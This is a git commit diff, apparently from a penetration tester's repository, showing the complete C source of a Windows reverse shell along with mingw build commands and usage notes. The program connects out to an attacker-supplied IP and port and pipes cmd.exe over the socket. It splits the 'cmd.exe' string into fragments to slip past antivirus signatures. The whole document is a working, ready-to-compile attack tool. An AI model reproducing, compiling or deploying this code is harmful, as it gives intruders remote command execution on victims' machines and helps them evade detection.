Simple reverse-shell added.

This commit is contained in:
mgeeky 2019-06-28 13:22:06 +02:00
parent d81f92ad28
commit e1162690ea

View File

@ -4,12 +4,12 @@
* *
* Compilation: * Compilation:
* - x64 * - x64
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 * $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
* - x86 * - x86
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32 * $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
* *
* Usage: * Usage:
* cmd> revshell <IP> <PORT> & * cmd> revshell <IP> <PORT> &
* *
* Where: * Where:
* - ip - remote attacker's server IP * - ip - remote attacker's server IP
@ -21,7 +21,7 @@
#include <stdio.h> #include <stdio.h>
#ifdef _MSC_VER #ifdef _MSC_VER
# pragma comment(lib, "ws2_32") # pragma comment(lib, "ws2_32")
#endif #endif
int main(int argc, char *argv[]) int main(int argc, char *argv[])
@ -33,38 +33,38 @@ int main(int argc, char *argv[])
if (argc < 3) if (argc < 3)
{ {
return 0; return 0;
} }
const char *hostname = argv[1]; const char *hostname = argv[1];
unsigned int port = atoi(argv[2]); unsigned int port = atoi(argv[2]);
WSAStartup(MAKEWORD(2,2), &wsaData); WSAStartup(MAKEWORD(2,2), &wsaData);
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
struct hostent *host = gethostbyname(hostname); struct hostent *host = gethostbyname(hostname);
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr))); strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
sin.sin_family = AF_INET; sin.sin_family = AF_INET;
sin.sin_port = htons(port); sin.sin_port = htons(port);
sin.sin_addr.s_addr = inet_addr(saddr); sin.sin_addr.s_addr = inet_addr(saddr);
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL); WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
if (WSAGetLastError() == 0) if (WSAGetLastError() == 0)
{ {
STARTUPINFO sinfo = {0}; STARTUPINFO sinfo = {0};
PROCESS_INFORMATION procinfo = {0}; PROCESS_INFORMATION procinfo = {0};
sinfo.cb = sizeof(sinfo); sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = STARTF_USESTDHANDLES; sinfo.dwFlags = STARTF_USESTDHANDLES;
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock; sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
char *cmd[4] = { "cm", "d.e", "x", "e" }; char *cmd[4] = { "cm", "d.e", "x", "e" };
char command[8] = ""; char command[8] = "";
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]); snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo); CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
} }
return 0; return 0;
} }